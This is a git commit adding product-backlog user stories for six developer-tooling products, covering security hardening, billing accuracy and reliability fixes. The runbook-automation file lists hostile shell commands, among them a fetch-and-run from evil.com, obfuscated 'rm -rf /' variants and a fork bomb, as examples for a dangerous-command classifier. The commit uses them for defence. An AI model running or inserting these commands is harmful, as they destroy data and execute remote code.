Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting): - P1 route: 8pts (key redaction, SSE billing, token math, CI runner) - P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber) - P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation) - P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier) - P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback) - P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures) Total: 61 story points across 30 new stories
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions
--- a/products/01-llm-cost-router/epics/epic-addendum-bmad.md
+++ b/products/01-llm-cost-router/epics/epic-addendum-bmad.md
@@ -0,0 +1,64 @@
+# dd0c/route — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Proxy Engine
+
+### Story 1.5: API Key Redaction in Error Traces
+As a security-conscious developer, I want all API keys scrubbed from panic traces, error logs, and telemetry events, so that a proxy crash never leaks customer credentials.
+
+**Acceptance Criteria:**
+- Custom panic handler intercepts all panics and runs `redact_sensitive()` before logging.
+- Regex patterns cover `sk-*`, `sk-ant-*`, `sk-proj-*`, `Bearer *` tokens.
+- Telemetry events never contain raw API keys (verified by unit test scanning serialized JSON).
+- Error responses to clients never echo back the Authorization header value.
+
+**Estimate:** 2 points
+
+### Story 1.6: SSE Disconnect Billing Accuracy
+As an engineering manager, I want billing to reflect only the tokens actually streamed to the client, so that early disconnects don't charge for undelivered tokens.
+
+**Acceptance Criteria:**
+- When a client disconnects mid-stream, the proxy aborts the upstream connection within 1 second.
+- Usage record reflects only tokens in chunks that were successfully flushed to the client.
+- Disconnect during prompt processing (before first token) records 0 completion tokens.
+- Provider connection count returns to 0 after client disconnect (no leaked connections).
+
+**Estimate:** 3 points
+
+---
+
+## Epic 2 Addendum: Router Brain
+
+### Story 2.5: Token Calculation Edge Cases
+As a billing-accurate platform, I want token counting to handle Unicode, CJK, and emoji correctly per provider tokenizer, so that cost calculations match provider invoices within 1%.
+
+**Acceptance Criteria:**
+- Uses `cl100k_base` for OpenAI models, Claude tokenizer for Anthropic models.
+- Token count for emoji sequences (🌍🔥) matches provider's count within 1%.
+- CJK characters tokenized correctly (each char = 1+ tokens).
+- Property test: 10K random strings, our count vs mock provider count within 1% tolerance.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 8 Addendum: Infrastructure & DevOps
+
+### Story 8.7: Dedicated CI Runner for Latency Benchmarks
+As a solo founder, I want proxy latency benchmarks to run on a dedicated self-hosted runner (NAS), so that P99 measurements are reproducible and not polluted by shared CI noise.
+
+**Acceptance Criteria:**
+- GitHub Actions workflow triggers on pushes to `src/proxy/**`.
+- Runs `cargo bench --bench proxy_latency` on self-hosted runner.
+- Fails the build if P99 exceeds 5ms.
+- Results stored in `target/criterion/` for trend tracking.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 8 points across 4 stories
--- a/products/02-iac-drift-detection/epics/epic-addendum-bmad.md
+++ b/products/02-iac-drift-detection/epics/epic-addendum-bmad.md
@@ -0,0 +1,77 @@
+# dd0c/drift — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 2 Addendum: Agent Communication
+
+### Story 2.7: mTLS Revocation — Instant Lockout
+As a security-conscious platform operator, I want revoked agent certificates to be instantly locked out (including active connections), so that a compromised agent cannot continue sending data.
+
+**Acceptance Criteria:**
+- CRL refresh triggers within 30 seconds of cert revocation.
+- Existing mTLS connections from revoked certs are terminated (not just new connections rejected).
+- New connection attempts with revoked certs return TLS handshake failure.
+- Payload replay with captured nonce returns HTTP 409 Conflict.
+
+**Estimate:** 3 points
+
+---
+
+## Epic 3 Addendum: Drift Analysis Engine
+
+### Story 3.8: Terraform State Lock Recovery on Panic
+As a customer, I want the panic button to safely release Terraform state locks, so that hitting "stop" doesn't brick my infrastructure.
+
+**Acceptance Criteria:**
+- Panic mode triggers `terraform force-unlock` if normal unlock fails.
+- State lock is verified released within 10 seconds of panic signal.
+- Agent logs the force-unlock attempt for audit trail.
+- If both unlock methods fail, agent alerts the admin with the lock ID for manual recovery.
+
+**Estimate:** 3 points
+
+### Story 3.9: pgmq Visibility Timeout for Long Scans
+As a self-hosted operator, I want long-running drift scans to extend their pgmq visibility timeout, so that a second worker doesn't pick up the same job mid-scan.
+
+**Acceptance Criteria:**
+- Worker extends visibility by 2 minutes every 90 seconds during processing.
+- No duplicate processing occurs for scans taking up to 15 minutes.
+- If worker crashes without extending, job becomes visible after timeout (correct behavior).
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Dashboard API
+
+### Story 5.8: RLS Connection Pool Leak Prevention
+As a multi-tenant SaaS, I want PgBouncer to clear tenant context between requests, so that Tenant A's drift data never leaks to Tenant B.
+
+**Acceptance Criteria:**
+- `SET LOCAL app.tenant_id` is cleared on connection return to pool.
+- 100 concurrent tenant requests produce zero cross-tenant data leakage.
+- Stress test with interleaved tenant requests on same PgBouncer connection passes.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 10 Addendum: Transparent Factory Compliance
+
+### Story 10.6: Secret Scrubber Entropy Scanning
+As a security-first platform, I want the secret scrubber to detect high-entropy strings (not just regex patterns), so that Base64-encoded keys and custom tokens are caught.
+
+**Acceptance Criteria:**
+- Shannon entropy > 3.5 bits/char on strings > 20 chars triggers redaction.
+- Base64-encoded AWS keys detected and scrubbed.
+- Multi-line RSA private keys detected and replaced with `[REDACTED RSA KEY]`.
+- Normal log messages (low entropy) are not false-positived.
+
+**Estimate:** 2 points
+
+---
+
+**Total Addendum:** 12 points across 5 stories
--- a/products/03-alert-intelligence/epics/epic-addendum-bmad.md
+++ b/products/03-alert-intelligence/epics/epic-addendum-bmad.md
@@ -0,0 +1,76 @@
+# dd0c/alert — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Webhook Ingestion
+
+### Story 1.6: HMAC Timestamp Freshness (Replay Prevention)
+As a security-conscious operator, I want webhook payloads older than 5 minutes to be rejected, so that captured webhooks cannot be replayed to flood my ingestion pipeline.
+
+**Acceptance Criteria:**
+- Datadog: Rejects `dd-webhook-timestamp` older than 300 seconds.
+- PagerDuty: Rejects payloads with missing timestamp header.
+- OpsGenie: Extracts timestamp from payload body and validates freshness.
+- Fresh webhooks (within 5-minute window) are accepted normally.
+
+**Estimate:** 2 points
+
+### Story 1.7: SQS 256KB Claim-Check Round-Trip
+As a reliable ingestion pipeline, I want large alert payloads (>256KB) to round-trip through S3 claim-check without data loss, so that high-cardinality incidents are fully preserved.
+
+**Acceptance Criteria:**
+- Payloads > 256KB are compressed and stored in S3; SQS message contains S3 pointer.
+- Correlation engine fetches from S3 and processes the full payload.
+- S3 fetch timeout (10s) sends message to DLQ without crashing the engine.
+- Engine health check returns 200 after S3 timeout recovery.
+
+**Estimate:** 3 points
+
+---
+
+## Epic 2 Addendum: Correlation Engine
+
+### Story 2.6: Out-of-Order Alert Delivery
+As a reliable correlation engine, I want late-arriving alerts to attach to existing incidents (not create duplicates), so that distributed monitoring delays don't fragment the incident timeline.
+
+**Acceptance Criteria:**
+- Alert arriving after window close but within 2x window attaches to existing incident.
+- Alert arriving after 3x window creates a new incident.
+- Attached alerts update the incident timeline with correct original timestamp.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Slack Bot
+
+### Story 5.6: Free Tier Enforcement (10K alerts/month)
+As a PLG product, I want free tier tenants limited to 10K alerts/month with 7-day retention, so that the free tier is sustainable and upgrades are incentivized.
+
+**Acceptance Criteria:**
+- Alert at count 9,999 accepted; alert at count 10,001 returns 429 with Stripe upgrade URL.
+- Counter resets on first of each month.
+- Data older than 7 days purged for free tier; 90-day retention for pro tier.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 6 Addendum: Dashboard API
+
+### Story 6.7: Cross-Tenant Negative Isolation Tests
+As a multi-tenant SaaS, I want explicit negative tests proving Tenant A cannot read Tenant B's data, so that confused deputy vulnerabilities are caught before launch.
+
+**Acceptance Criteria:**
+- Tenant A query returns zero Tenant B incidents (explicit assertion, not just "works for A").
+- Cross-tenant incident access returns 404 (not 403 — don't leak existence).
+- Tenant A analytics reflect only Tenant A's alert count.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 10 points across 5 stories
--- a/products/04-lightweight-idp/epics/epic-addendum-bmad.md
+++ b/products/04-lightweight-idp/epics/epic-addendum-bmad.md
@@ -0,0 +1,76 @@
+# dd0c/portal — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: AWS Discovery Engine
+
+### Story 1.7: Partial Scan Failure Recovery
+As a catalog operator, I want partial discovery scan failures (timeout, rate limit) to preserve existing catalog entries, so that a flaky AWS API call doesn't delete half my service catalog.
+
+**Acceptance Criteria:**
+- Partial AWS scan (500 of 1000 resources) stages results without committing; all 1000 existing entries preserved.
+- Partial GitHub scan (rate limited at 50 of 100) preserves all 100 ownership mappings.
+- Scan failure triggers admin alert (not silent failure).
+
+**Estimate:** 3 points
+
+---
+
+## Epic 2 Addendum: GitHub Discovery
+
+### Story 2.6: Ownership Conflict Resolution
+As a catalog operator, I want explicit ownership sources (CODEOWNERS/config) to override implicit sources (AWS tags) and heuristics (commit history), so that ownership is deterministic and predictable.
+
+**Acceptance Criteria:**
+- Priority: Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits).
+- Concurrent discovery from two sources does not create duplicate catalog entries.
+- Heuristic inference does not override an explicitly set owner.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 4 Addendum: Search Engine
+
+### Story 4.5: Meilisearch Zero-Downtime Index Rebuild
+As a catalog user, I want Cmd+K search to work during index rebuilds, so that reindexing doesn't cause downtime.
+
+**Acceptance Criteria:**
+- Search returns results during active index rebuild (swap-based rebuild).
+- Rebuild failure does not corrupt the active index.
+- Cmd+K prefix search from Redis cache returns in <10ms.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 8 Addendum: Infrastructure & DevOps
+
+### Story 8.7: VCR Cassette Freshness CI
+As a maintainer, I want VCR cassettes re-recorded weekly against real AWS, so that API response drift is caught before it breaks integration tests.
+
+**Acceptance Criteria:**
+- Weekly CI job (Monday 6 AM UTC) re-records cassettes with real AWS credentials.
+- Creates PR if any cassettes changed (API drift detected).
+- Diff summary shows which cassettes changed and by how much.
+
+**Estimate:** 1 point
+
+---
+
+## Epic 9 Addendum: Onboarding & PLG
+
+### Story 9.6: Free Tier Enforcement (50 Services)
+As a PLG product, I want free tier tenants limited to 50 services, so that the free tier is sustainable.
+
+**Acceptance Criteria:**
+- 50th service creation succeeds; 51st returns 403 with upgrade prompt.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 9 points across 5 stories
--- a/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md
+++ b/products/05-aws-cost-anomaly/epics/epic-addendum-bmad.md
@@ -0,0 +1,75 @@
+# dd0c/cost — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 2 Addendum: Anomaly Detection Engine
+
+### Story 2.8: Concurrent Baseline Update Conflict Resolution
+As a reliable anomaly detector, I want concurrent Lambda invocations updating the same baseline to converge correctly via DynamoDB conditional writes, so that Welford running stats are never corrupted.
+
+**Acceptance Criteria:**
+- Two simultaneous updates to the same baseline both succeed (one retries via ConditionalCheckFailed).
+- Final baseline count reflects both observations.
+- Retry reads fresh baseline before re-applying the update.
+
+**Estimate:** 2 points
+
+### Story 2.9: Property-Based Anomaly Scorer Validation (10K runs)
+As a mathematically sound anomaly detector, I want the scorer validated with 10K property-based test runs, so that edge cases in the scoring function are caught before launch.
+
+**Acceptance Criteria:**
+- Score is always between 0 and 100 for any valid input (10K runs, seed=42).
+- Score monotonically increases as cost increases (10K runs).
+- Reproducible via fixed seed.
+
+**Estimate:** 1 point
+
+---
+
+## Epic 3 Addendum: Notification Service
+
+### Story 3.7: Remediation RBAC (Slack Action Authorization)
+As a security-conscious operator, I want only account owners to trigger destructive remediation actions (Stop Instance), so that a random Slack viewer can't shut down production.
+
+**Acceptance Criteria:**
+- Owner role can trigger "Stop Instance" (200).
+- Viewer role gets 403 with "insufficient permissions".
+- User from different Slack workspace gets 403.
+- Non-destructive actions (snooze, mark-expected) allowed for all authenticated users.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 4 Addendum: Customer Onboarding
+
+### Story 4.7: Clock Interface for Governance Tests
+As a testable governance engine, I want time-dependent logic (14-day auto-promotion) to use an injectable Clock interface, so that governance tests are deterministic and don't depend on wall-clock time.
+
+**Acceptance Criteria:**
+- `FakeClock` can be injected into `GovernanceEngine`.
+- Day 13: no promotion. Day 15 + low FP rate: promotion. Day 15 + high FP rate: no promotion.
+- No `Date.now()` calls in governance logic — all via Clock interface.
+
+**Estimate:** 1 point
+
+---
+
+## Epic 8 Addendum: Infrastructure & DevOps
+
+### Story 8.7: Redis Failure Safe Default for Panic Mode
+As a resilient platform, I want panic mode checks to default to "active" (safe) when Redis is unreachable, so that a Redis outage doesn't accidentally disable safety controls.
+
+**Acceptance Criteria:**
+- Redis disconnect → `checkPanicMode()` returns `true` (panic active).
+- Warning logged: "Redis unreachable — defaulting to panic=active".
+- Normal operation resumes when Redis reconnects.
+
+**Estimate:** 1 point
+
+---
+
+**Total Addendum:** 7 points across 5 stories
--- a/products/06-runbook-automation/epics/epic-addendum-bmad.md
+++ b/products/06-runbook-automation/epics/epic-addendum-bmad.md
@@ -0,0 +1,81 @@
+# dd0c/run — Epic Addendum (BMad Review Findings)
+
+**Source:** BMad Code Review (March 1, 2026)
+**Approach:** Surgical additions to existing epics — no new epics created.
+
+---
+
+## Epic 1 Addendum: Runbook Parser
+
+### Story 1.7: Shell AST Parsing (Not Regex)
+As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
+
+**Acceptance Criteria:**
+- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
+- `eval $(echo 'rm -rf /')` classified as Dangerous.
+- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
+- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
+- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
+- Heredoc with embedded danger classified as Dangerous.
+- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
+- `kubectl get pods -n production` classified as Safe.
+
+**Estimate:** 5 points
+
+---
+
+## Epic 2 Addendum: Action Classifier
+
+### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
+As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
+
+**Acceptance Criteria:**
+- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
+- All 50 classified as Dangerous — any miss is a blocking CI failure.
+- Suite count assertion prevents accidental removal of canary commands.
+- Runs on every push and PR.
+
+**Estimate:** 2 points
+
+---
+
+## Epic 3 Addendum: Execution Engine
+
+### Story 3.8: Intervention Deadlock TTL
+As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
+
+**Acceptance Criteria:**
+- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
+- FailedClosed triggers out-of-band critical alert with execution context.
+- Human resolution before TTL transitions to Complete (no FailedClosed).
+
+**Estimate:** 2 points
+
+---
+
+## Epic 5 Addendum: Audit Trail
+
+### Story 5.7: Streaming Append-Only Audit with Hash Chain
+As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
+
+**Acceptance Criteria:**
+- Audit event available within 100ms of command execution (no batching).
+- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
+- WAL (write-ahead log): events survive agent crash and are recoverable.
+
+**Estimate:** 3 points
+
+### Story 5.8: Cryptographic Signatures for Agent Updates
+As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
+
+**Acceptance Criteria:**
+- Agent rejects binary update with invalid signature.
+- Agent rejects policy update signed only by SaaS key (requires customer key).
+- Agent accepts update with valid customer signature.
+- Failed signature verification falls back to existing policy (no degradation).
+
+**Estimate:** 3 points
+
+---
+
+**Total Addendum:** 15 points across 5 stories